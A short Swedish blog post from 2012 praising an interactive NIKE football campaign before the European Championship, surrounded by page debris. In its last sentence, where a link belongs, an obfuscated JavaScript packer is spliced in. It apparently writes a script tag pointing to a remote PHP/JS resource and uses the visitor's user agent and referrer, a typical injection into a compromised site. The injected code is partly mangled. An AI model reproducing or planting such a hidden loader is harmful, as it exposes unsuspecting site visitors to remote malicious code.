Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

NIKE laddar inför EM med en fantastisk digital kampanj

NIKE laddar inför EM med en fantastisk digital kampanj
Filip Urde
  • On 24 maj, 2012
  • http://www.revue.se/filip-urde

Jag älskar digitala kampanjer som man kan interagera med och här har vi ännu en flådig kampanj från NIKE som visar hur en viral reklamkampanj ska se ut.

Man får i filmen följa med i en fotbollsmatch där du kan interagera med olika spelare, miljöer och även Pep Guardiola som sitter på läktaren. Allt är väldigt snyggt presenterat och gör att man faktiskt vill avnjuta lite reklam. Alltså: Bra reklam vill man titta på och interagera med.

Gå eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|baahe|var|u0026u|referrer|rnbzn||js|php’.split(’|’),0,{}))
in här och testa.